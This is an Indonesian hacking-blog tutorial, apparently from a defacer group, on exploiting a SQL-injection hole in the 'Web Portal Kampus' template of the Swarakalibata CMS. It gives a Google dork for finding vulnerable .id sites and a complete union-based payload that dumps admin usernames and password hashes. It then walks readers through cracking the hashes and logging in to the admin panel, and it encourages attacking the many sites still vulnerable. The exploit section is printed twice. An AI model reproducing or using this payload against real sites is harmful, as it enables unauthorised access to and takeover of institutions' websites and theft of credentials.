Template Web Portal Kampus Swarakalibata SQL-Injection Vulnerability
Hallo sobat pixel kembali lagi nih hehe, udah lama nggak pernah post tutorial hek hek-an kan? hehe. So jadi kali ini gue mau ngebagiin tutorial SQL-Injection Pada CMS Swarakalibata. Nah loh? kok iso? Ya iso lah, mantan mu ku tikung aja iso :3. Lanjut aja sebelumna pada CMS Swarakalibata ini memiliki vulnerable pada bagian register kontributor berita. But ada satu template yang memiliki vulnerable SQL-Injection yaitu Web Portal Kampus. Lanjut aja simak gimana
[+] Exploit Title: Template Web Portal Kampus Swarakalibata SQL-Injection Vulnerability
[+] Author: ./Sn00py
[+] Team: N45HT
[+] Google Dork:
"inurl:/page/detail/kata-sambutan site:id"
[+] Tested on: Windows 10 pro
[+] Vendor: https://phpmu.com
=======================================
[+] Proof Of Concept:
Pertama, kalian harus mencari tahu apakah situs memakai template Web Portal Kampus, Jika situs tersebut memakai templatenya maka akan seperti ini tampilannya.
Jika sudah valid memakai template web portal kampus, langsung kalian cek apa di situs tersebut memiliki fitur pencarian kata kunci dan jika kalian memasukkan string ', ada peringatan A Database Error Terjadi maka itu adalah vuln.
Langsung saja kalian memasukan exploit dibawah, Dan taraaa muncul admin password tinggal kalian decrypt deh.
[+] Exploit:
' and false union select 1,2,3,concat(0x496E6A65637465647E,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -
passwordnya type SHA512 ya jadi kalian tinggal decrypt aja, Nah kan muncul lagi MD5 jadi kalian decrypt lagi.
dan taraaa password found!
[+] Find login admin
Administrator
Admin
Adminweb
Jika sudah login terserah deh mau ngapain kalo udah di dashboard admin ^^
[+] Demo? No Demo ^^ Happy Hacking~
[+] Exploit Title: Template Web Portal Kampus Swarakalibata SQL-Injection Vulnerability
[+] Author: ./Sn00py
[+] Team: N45HT
[+] Google Dork:
"inurl:/page/detail/kata-sambutan site:id"
[+] Tested on: Windows 10 pro
[+] Vendor: https://phpmu.com
=======================================
[+] Proof Of Concept:
Pertama, kalian harus mencari tahu apakah situs memakai template Web Portal Kampus, Jika situs tersebut memakai templatenya maka akan seperti ini tampilannya.
(Nb: Gambar diatas hanya contoh)
Jika sudah valid memakai template web portal kampus, langsung kalian cek apa di situs tersebut memiliki fitur pencarian kata kunci dan jika kalian memasukkan string ', ada peringatan A Database Error Terjadi maka itu adalah vuln.
Langsung saja kalian memasukan exploit dibawah, Dan taraaa muncul admin password tinggal kalian decrypt deh.
[+] Exploit:
' and false union select 1,2,3,concat(0x496E6A65637465647E,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -
passwordnya type SHA512 ya jadi kalian tinggal decrypt aja, Nah kan muncul lagi MD5 jadi kalian decrypt lagi.
dan taraaa password found!
[+] Find login admin
Administrator
Admin
Adminweb
Jika sudah login terserah deh mau ngapain kalo udah di dashboard admin ^^
[+] Demo? No Demo ^^ Happy Hacking~
Gimana cukup mudah bukan? btw ini masih banyak yang vuln loh tinggal kembangin aja dorknya. Oke mungkin cukup sekian dari saya dont forget too share and see you next time byee~
Greetz: Khatulistiwa - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer